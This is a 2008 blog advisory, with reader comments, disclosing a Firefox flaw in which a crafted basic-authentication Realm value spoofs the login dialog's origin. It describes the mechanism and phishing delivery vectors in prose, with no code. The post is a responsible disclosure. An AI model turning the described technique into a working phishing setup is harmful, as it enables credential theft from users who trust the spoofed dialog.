If at first you don't succeed; call it version 1.0
Wednesday, January 02, 2008

Summary

Mozilla Firefox allows spoofing the information presented in the basic authentication dialog box. This can allow an attacker to conduct phishing attacks, by tricking the user to believe that the authentication dialog box is from a trusted website.

 

Affected versions

Mozilla Firefox v2.0.0.11.
Prior versions and other Mozilla products may also be affected.

 

Technical details

Mozilla Firefox displays an authentication dialog, whenever the visited web server returns 401 status code, and the "WWW-Authenticate" header. In order to specify basic authentication, the "WWW-Authenticate" header should have the value [Basic realm="XXX"] (without the brackets). The Realm value, which in this case is XXX, will be displayed in the authentication dialog window.

While Firefox does not display the characters in the "WWW-Authenticate" header Realm value after the last double-quotes ("), it fails to sanitize single-quotes (') and spaces. This makes it possible for an attacker to create a specially crafted Realm value which will look as if the authentication dialog came from a trusted web site.

 

image

 

There are at-least two possible attack vectors:

  1. An attacker creates a web page with a link to a trusted website (e.g. Bank, PayPal, Webmail, etc.). When the victim clicks on the link, the trusted web page will be opened in a new window, and a script will be executed to redirect the new opened window to the attacker's web server, which will then return the specially crafted basic authentication response.
  2. An attacker embeds an image (pointing to the attacker's web server, which will return the specially crafted basic authentication response) to:
    1. A mail which will be sent to a webmail user.
    2. RSS feed which will be consumed by a web RSS reader.
    3. A forum/blog/social network page.

 

A video which demonstrates the first attack vector can be found on YouTube. A better quality video can be download from here.

A video of a real live attack on a forum, which used basic authentication but without exploiting the vulnerability, can be found on Zull's weblog (Hebrew).

 

Suggestion / Workaround

Until Mozilla fixes this vulnerability, I recommend not to provide username and password to web sites which show this dialog.

[UPDATE:] Due to some questions, I've put a list of frequently asked questions.

 


Wednesday, January 02, 2008 10:15:57 PM UTC | Comments [9] | Security#
Thursday, January 03, 2008 4:35:57 AM UTC
Great discovery :-)
As I told you before, I love the way that a good attack is now a mix of technology and human behavior explotation.
a link directly to the video on my site (for non Hebrew speakers): http://hacking.org.il/demos/dr-rover1.wmv

Thursday, January 03, 2008 1:53:39 PM UTC
I tried to reproduce your bug and that's what I got:
http://www.bitsploit.de/uploads/Bilder/200801031147/firefox_http-auth.jpg

The visualization of the (double-)quotes differs. But well, it's hard to recognize if you're reading too fast.

As you can see in the screenshot of the German localization of Firefox, there's one more word after the real domain name. So it also depends on the localization you're using. That's why you've got to find some good sentences to avoid mistrust.
Friday, January 04, 2008 7:14:55 AM UTC
Thanks for the info! I will be checking your blog often now.
Take care, Tom
Friday, January 04, 2008 2:35:46 PM UTC
Did you inform Mozilla Bugzilla?
=> https://bugzilla.mozilla.org/
Friday, January 04, 2008 4:49:13 PM UTC
https://bugzilla.mozilla.org/show_bug.cgi?id=244273
Friday, January 04, 2008 5:12:48 PM UTC
O_o man how did you find it?
ps. there is some news about you :P
ex. http://tech.wp.pl/kat,1009785,title,Firefox-blad-pozwala-na-przechwycenie-hasel,wid,9533836,wiadomosc.html?rfbawp=1199466225.807&ticaid=151eb
Friday, January 04, 2008 5:17:05 PM UTC
Firefox is following the standards. The relevant RFCs state that realm-value is quoted-string. quote-string can include ANY character between two double quotes. If they were to "sanitize" the string as you claim they should, then they would be non-compliant with the relevant standards.

The REAL solution would be to have Firefox make a dramatic visual distinction between the provided realm-value and rest of authentication request. This would make it clear what has been provided by the remote website.
Sunday, January 06, 2008 1:41:59 PM UTC
One can easily see, that this is a fake, because Firefox does not double-space after full stop (Help -> Check for Updates... -> "There are no new updates available. Firefox may...").
Saturday, February 02, 2008 7:32:02 PM UTC
Good find Aviv.

And for all the nay-sayers: how about spoofing ssl in Firefox:

http://www.0x000000.com/index.php?i=509

and make it an issue. :)
Comments are closed.     
Send me an Email
Follow me on Twitter
RSS Feeds
  
Blogroll
Archive
Admin Login
Sign In
Disclaimer
The opinions expressed herein are my own personal opinions and do not represent my employer's view in anyway.